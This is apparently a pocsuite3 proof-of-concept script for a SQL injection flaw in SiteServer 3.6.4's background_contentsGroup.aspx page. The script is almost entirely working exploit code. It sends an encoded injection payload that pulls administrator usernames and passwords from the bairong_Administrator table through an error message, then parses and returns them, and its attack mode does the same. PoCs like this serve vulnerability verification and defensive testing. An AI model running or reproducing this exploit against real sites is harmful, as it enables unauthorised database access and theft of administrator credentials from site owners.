SiteServer 3.6.4 /siteserver/cms/background_contentsGroup.aspx SQL注入漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from urllib.parse import urlencode from pocsuite3.api import Output, POCBase, register_poc, requests class DemoPOC(POCBase): vulID = '1150' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2013-12-06' createDate = '2013-12-14' updateDate = '2013-12-14' references = ['http://www.wooyun.org/bugs/wooyun-2013-045051'] name = 'SiteServer 3.6.4 /siteserver/cms/background_contentsGroup.aspx SQL注入漏洞 POC' appPowerLink = 'http://www.siteserver.cn/' appName = 'SiteServer' appVersion = '3.6.4#' vulType = 'SQL Injection' desc = ''' SiteServer V3.6.4 application has a SQL injection vulnerability in "/siteserver/cms/background_contentsGroup.aspx",and attacker can use this to get DB infomation. ''' samples = [] install_requires = [''] def _verify(self): result = {} payload = { 'publishmentSystemID': '1', 'contentGroupName': "2111') and 1=(select top 1 char(116)+char(104)+char(105)+char(115)+char(95)+char(105)+char(115)+char(95)+char(110)+char(111)+char(95)+char(105)+char(110)+char(95)+char(116)+char(104)+char(105)+char(115)+char(95)+char(115)+char(101)+char(114)+char(118)+char(101)+char(114)+char(95)+char(51)+char(49)+char(55)+char(56)+char(50)+char(57)+char(56)+char(55)+char(54)+char(45)+char(45)+char(45)+char(45)+char(45)+char(45)+[Username]+char(45)+char(45)+char(45)+char(45)+char(45)+char(45)+[Password]+char(45)+char(45)+char(45)+char(45)+char(45)+char(45)+char(45)+char(57)+char(56)+char(55)+char(54)+char(95)+char(110)+char(111)+char(95)+char(104)+char(101)+char(114)+char(101) from [bairong_Administrator])) as t0--" } vulnpage = '/siteserver/cms/background_contentsGroup.aspx?' url = self.url + vulnpage + urlencode(payload) response = requests.get(url).text if 'this_is_no_in_this_server_317829876------' in response: contentlist = response.split('------') if contentlist[1] and contentlist[2]: result['AdminInfo'] = {} result['AdminInfo']['Username'] = contentlist[1] result['AdminInfo']['Password'] = contentlist[2] return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)